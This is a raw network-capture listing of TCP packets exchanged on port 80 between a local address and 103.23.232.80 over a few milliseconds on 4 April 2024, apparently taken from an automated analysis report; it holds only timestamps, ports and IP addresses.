Apr 4, 2024 17:49:07.203967094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.203983068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.203985929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204005957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204041004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204058886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204077959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204113960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204116106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204133987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204149008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204153061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204170942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204190016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204205036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204206944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204227924 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204248905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204268932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204303026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204324961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204355955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204391003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204389095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204428911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204463005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204464912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204493999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204534054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204550982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204569101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204586983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204586983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204613924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204628944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204628944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204683065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204700947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204716921 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204742908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204742908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204763889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204796076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204799891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204819918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204838991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204854012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204858065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204891920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.204900980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204935074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204972982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.204991102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205008984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205009937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205028057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205037117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205060005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205070972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205085993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205121994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205142975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205193043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205209970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205229044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205256939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205280066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205293894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205318928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205332994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205334902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205349922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205369949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205389023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205390930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205409050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205426931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205446005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205462933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205502987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205533981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205553055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205571890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205588102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205602884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205607891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205626965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205662966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205681086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205696106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205701113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205718994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205719948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205758095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205776930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205795050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205820084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205832005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205848932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205868006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205883026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205905914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205905914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205923080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.205956936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.205993891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206012964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206031084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206049919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206049919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206068993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206104994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206106901 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206136942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206141949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206147909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206170082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206217051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206232071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206250906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206269026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206269026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206285000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206289053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206305981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206352949 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206370115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206386089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206404924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206420898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206438065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206444979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206475973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206494093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206511974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206527948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206551075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206581116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206599951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206617117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206634998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206660032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206676960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206686974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206701040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206717968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206752062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206770897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206789970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206806898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206808090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206828117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206830025 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206861973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206868887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206883907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206935883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206955910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206970930 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206974983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.206994057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.206999063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207015991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207051992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207083941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207103014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207123041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207139015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207142115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207154036 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207158089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207178116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207210064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207237005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207253933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207273006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207287073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207304001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207309961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207330942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207362890 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207370996 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207386971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207410097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207425117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207470894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207529068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207544088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207562923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207585096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207587004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207623005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207640886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207658052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207675934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207690954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207715988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207747936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207782984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207792997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207808018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207844019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207853079 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207864046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207880020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207928896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207943916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207962036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207977057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.207981110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207999945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.207999945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208019018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208031893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208087921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208115101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208122969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208129883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208148003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208177090 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208175898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208183050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208199024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208211899 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208230019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208245039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208280087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208297968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208316088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208336115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208379030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208417892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208419085 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208434105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208470106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208491087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208507061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208525896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208525896 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208545923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208585024 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208589077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208606005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208619118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208631992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208648920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208661079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208714962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208740950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208797932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208828926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208836079 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208862066 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208894014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208926916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.208934069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208952904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.208966970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209017992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209033012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209050894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209064007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209069967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209089041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209089994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209120989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209148884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209167957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209187031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209218025 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209225893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209250927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209264040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209281921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209283113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209299088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209306002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209340096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209357023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209372044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209394932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209394932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209408045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209445000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209475040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209479094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209498882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209536076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209554911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209609985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209641933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209650040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209678888 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209702969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209758997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209774017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209791899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209793091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209829092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209831953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209867001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209884882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209918022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.209943056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209959030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.209999084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210035086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210051060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210062981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210069895 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210133076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210148096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210164070 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210187912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210189104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210206032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210238934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210261106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210277081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210293055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210309029 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210313082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210367918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210401058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210441113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210459948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210479021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210493088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210498095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210513115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.210519075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210553885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.210589886 CEST	49730	80	192.168.2.10	103.23.232.80
